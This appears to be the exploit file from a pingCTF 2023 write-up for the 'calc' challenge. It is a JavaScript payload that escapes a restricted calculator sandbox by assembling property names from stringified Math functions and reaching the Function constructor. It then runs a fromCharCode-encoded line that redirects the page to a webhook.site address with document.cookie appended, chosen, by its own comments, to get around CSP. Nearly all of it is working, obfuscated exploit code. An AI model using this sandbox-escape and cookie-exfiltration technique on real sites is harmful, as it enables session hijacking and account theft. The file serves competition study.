pingCTF 2023 - calc

calc.js

// Gather characters to make words
a=1/0+Math.floor+Math.atan+Math.cos+Math+Math.log1p+Math.abs+Math.min+Math.E

// c = "constructor"
E=11;c=a[E]
E=14;c=c+a[E]
E=1;c=c+a[E]
E=86;c=c+a[E]
E=6;c=c+a[E]
E=21;c=c+a[E]
E=9;c=c+a[E]
E=11;c=c+a[E]
E=6;c=c+a[E]
E=14;c=c+a[E]
E=21;c=c+a[E]

E=c
a=a+c[E] // Add String constructor to a (unused)

// f = "split"
E=86;f=a[E]
E=133;f=f+a[E]
E=18;f=f+a[E]
E=3;f=f+a[E]
E=6;f=f+a[E]

E=2
g=f[E] // g = "l"

// h = "return escape"
E=21;h=a[E]
E=33;h=h+a[E]
E=6;h=h+a[E]
E=9;h=h+a[E]
E=21;h=h+a[E]
E=1;h=h+a[E]
E=16;h=h+a[E]
E=33;h=h+a[E]
E=86;h=h+a[E]
E=11;h=h+a[E]
E=29;h=h+a[E]
E=133;h=h+a[E]
E=33;h=h+a[E]

// j = "big"
E=109;j=a[E]
E=3;j=j+a[E]
E=131;j=j+a[E]

Math=j
E=j
a=a+Math[E]() // Add "<big></big>" to a

// i = "concat"
E=11;i=a[E]
E=14;i=i+a[E]
E=1;i=i+a[E]
E=11;i=i+a[E]
E=29;i=i+a[E]
E=6;i=i+a[E]

E=f
Math=f
s=Math[E](g) // s = "split".split("l")
Math=Math[E]
E=c
z=Math[E](h) // z = "split".split["constructor"]("return escape")
Math=s
E=i
y=Math[E](z) // y = s.concat(z)
Math=y
E=2          // (Can only execute functions when a member if defined)
y=Math[E]()  // y = z()
Math=s
E=i
y=Math[E](y)
Math=y
E=2
a=a+Math[E](a) // a = a + escape(a) (This adds 'C')

// k = 'fromCharCode'
E=2;k=a[E]
E=21;k=k+a[E]
E=14;k=k+a[E]
E=195;k=k+a[E]
E=716;k=k+a[E]
E=118;k=k+a[E]
E=29;k=k+a[E]
E=21;k=k+a[E]
E=716;k=k+a[E]
E=14;k=k+a[E]
E=37;k=k+a[E]
E=33;k=k+a[E]

Math=k
E=c
Math=Math[E] // Math = String["constructor"]
E=k

// Use `String.fromCharCode` to generate
// p = "document.location = "https://webhook.site/4459d4dc-c6a6-4ea0-936d-b9a8cab924e2?"+document.cookie"
// (CSP is enabled so fetch cannot be used)
p=Math[E](100);p=p+Math[E](111);p=p+Math[E](99);p=p+Math[E](117);p=p+Math[E](109);p=p+Math[E](101);p=p+Math[E](110);p=p+Math[E](116);p=p+Math[E](46);p=p+Math[E](108);p=p+Math[E](111);p=p+Math[E](99);p=p+Math[E](97);p=p+Math[E](116);p=p+Math[E](105);p=p+Math[E](111);p=p+Math[E](110);p=p+Math[E](32);p=p+Math[E](61);p=p+Math[E](32);p=p+Math[E](34);p=p+Math[E](104);p=p+Math[E](116);p=p+Math[E](116);p=p+Math[E](112);p=p+Math[E](115);p=p+Math[E](58);p=p+Math[E](47);p=p+Math[E](47);p=p+Math[E](119);p=p+Math[E](101);p=p+Math[E](98);p=p+Math[E](104);p=p+Math[E](111);p=p+Math[E](111);p=p+Math[E](107);p=p+Math[E](46);p=p+Math[E](115);p=p+Math[E](105);p=p+Math[E](116);p=p+Math[E](101);p=p+Math[E](47);p=p+Math[E](52);p=p+Math[E](52);p=p+Math[E](53);p=p+Math[E](57);p=p+Math[E](100);p=p+Math[E](52);p=p+Math[E](100);p=p+Math[E](99);p=p+Math[E](45);p=p+Math[E](99);p=p+Math[E](54);p=p+Math[E](97);p=p+Math[E](54);p=p+Math[E](45);p=p+Math[E](52);p=p+Math[E](101);p=p+Math[E](97);p=p+Math[E](48);p=p+Math[E](45);p=p+Math[E](57);p=p+Math[E](51);p=p+Math[E](54);p=p+Math[E](100);p=p+Math[E](45);p=p+Math[E](98);p=p+Math[E](57);p=p+Math[E](97);p=p+Math[E](56);p=p+Math[E](99);p=p+Math[E](97);p=p+Math[E](98);p=p+Math[E](57);p=p+Math[E](50);p=p+Math[E](52);p=p+Math[E](101);p=p+Math[E](50);p=p+Math[E](63);p=p+Math[E](34);p=p+Math[E](43);p=p+Math[E](100);p=p+Math[E](111);p=p+Math[E](99);p=p+Math[E](117);p=p+Math[E](109);p=p+Math[E](101);p=p+Math[E](110);p=p+Math[E](116);p=p+Math[E](46);p=p+Math[E](99);p=p+Math[E](111);p=p+Math[E](111);p=p+Math[E](107);p=p+Math[E](105);p=p+Math[E](101)

Math=Math[E] // Math = String.fromCharCode
E=c
z=Math[E](p) // z = Function(p)
Math=s
E=i
y=Math[E](z) // y = s.concat(z)
Math=y
E=2
y=Math[E]() // y[2]() (execute our payload)